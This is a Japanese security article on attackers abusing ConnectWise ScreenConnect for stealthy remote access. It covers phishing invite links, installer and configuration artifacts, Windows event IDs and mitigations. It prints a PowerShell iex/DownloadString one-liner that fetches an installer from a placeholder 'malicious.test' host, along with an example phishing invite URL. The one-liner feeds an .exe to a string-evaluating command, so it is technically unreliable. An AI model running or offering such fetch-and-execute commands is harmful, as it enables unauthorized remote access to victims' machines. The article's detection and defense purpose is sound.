はじめに:RMMツールの悪用が深刻化
最近、脅威アクターが初期アクセスを得るためにリモート管理および監視(RMM)ツールを悪用する事例が急増しており、かつては正当なIT管理のために使われていたプラットフォームへの監視が強化されています。AnyDeskは検出機能の向上により攻撃者間での人気が低下しましたが、ConnectWise ScreenConnectはステルス性の高い侵入、永続化、およびラテラルムーブメントのための好ましい選択肢として浮上しています。本記事では、悪意のあるアクターがScreenConnectの機能、インストーラーのアーティファクト、および通信チャネルをどのように悪用してエンドポイントを密かに侵害しているかを検証します。
RMM悪用の手口
RMMソリューションは、無人制御、スクリプト機能、ファイル転送、セッションロギングといった機能を提供し、これらはシステム管理者だけでなくサイバー犯罪者にとっても魅力的です。攻撃者は、被害者をカスタムのScreenConnectインストーラーや管理コンソールを通じて生成された招待リンクに誘導するフィッシング詐欺を仕掛けます。信頼されたサポートポータルを装ったフィッシングページをホストすることで、脅威アクターは主にメモリ内で実行され、ディスク上に最小限の痕跡しか残さない.msiインストーラーをドロップします。例えば、シンプルなPowerShellワンライナーで、完全なペイロードをディスクに書き込むことなくScreenConnectエージェントをインストールできます。
powershell iex (New-Object Net.WebClient).DownloadString('https://malicious.test/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest')
一度実行されると、エージェントはWindowsサービスとして自身を登録し、正当なITメンテナンスを装って攻撃者に永続的なリモートアクセスを提供します。
ScreenConnect悪用の詳細
ScreenConnectはWindows、macOS、Linux、iOS、Androidに対応しており、クロスプラットフォーム制御を可能にします。初期の.msiインストーラー(一般的にScreenConnect.ClientSetup.msiという名前)が一時ディレクトリ(例:C:\Users\Kh4lifa\AppData\Local\Temp\ScreenConnect\<version>\<hash>\ScreenConnect.ClientSetup.msi)から起動された後、エージェントはクライアントバイナリをC:\Program Files (x86)\ScreenConnect Client (<hash>)\ScreenConnect.WindowsClient.exeにドロップします。この実行ファイルは、システムプロファイルのAppDataフォルダーにあるuser.configおよびsystem.config XMLファイルから設定を読み込み、カスタムアクセスURLをIPアドレスと暗号化された起動キーにマッピングします。
チャットログやセッションデータはメモリ内にのみ存在するため、攻撃者のインタラクションの全容を明らかにするにはメモリ取得が不可欠であり、ディスクにログを永続化するAnyDeskとは異なります。攻撃者はコンソールの「Build+」オプションを利用して、段階的なデプロイメントを通じて被害者を誘導するカスタムインストーラーや招待リンクを生成します。一般的な招待URL(例:https://kh4lifa.test.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest)は、フィッシングメールやSMSに埋め込むことができます。ビルダーと招待リンクはコンソールから直接生成できるため、攻撃者は柔軟なフィッシング面を獲得します。
デプロイ後、イベントID 4573は新しいリモートアクセスセッションを通知し、その後アプリケーションログイベント100および101がセッションの開始と終了を記録します。ファイル転送は被害者のDocumentsディレクトリ下にフォルダ(例:C:\Users\Kh4lifa\Documents\ConnectWiseControl\Files)を作成し、イベント201はアウトバウンド転送をマークします。インバウンド転送には対応するイベントが生成されないため、フォレンジック分析はさらに複雑になります。
対策と緩和策
防御側は、ScreenConnectエージェントのバイナリとそのXML設定ファイルを検出のための主要なアーティファクトとして扱うべきです。Tempディレクトリでの予期せぬMSI実行や、ScreenConnect.WindowsClient.exeという名前のサービスの監視は、不正なインストールを特定するのに役立ちます。組織は、以下の対策を講じることでリスクを軽減できます。
- RMMコンソールアクセスの制限
- 多要素認証(MFA)の強制
- APIキーの定期的なローテーション
- カスタムビルダー生成の信頼できる担当者への制限
- メモリ内チャットログや一時的なキーを回復するためのメモリのスナップショット収集
user.configで見つかったDNS解決とIPアドレスの検証(悪意のあるドメインがC2インフラをホストしている場合があるため)- メールゲートウェイとWebプロキシによる既知の招待リンクパターンのブロック、および承認された企業インストーラーと異なる.msiパッケージのダウンロードスキャン
- SIEMプラットフォームへのイベントID 4573、100、101の検出ルールの統合による疑わしいリモートセッションのリアルタイムアラート
脅威アクターが正当なITツールを武器化し続ける中、ScreenConnectの悪用は、エンドポイント監視、ネットワーク異常検出、およびRMMプラットフォームに焦点を当てたプロアクティブな脅威ハンティングを組み合わせた多層防御戦略の必要性を強調しています。攻撃者の手法と主要な侵害指標を理解することで、セキュリティチームは不正アクセスが本格的な侵害にエスカレートする前に検出して阻止することができます。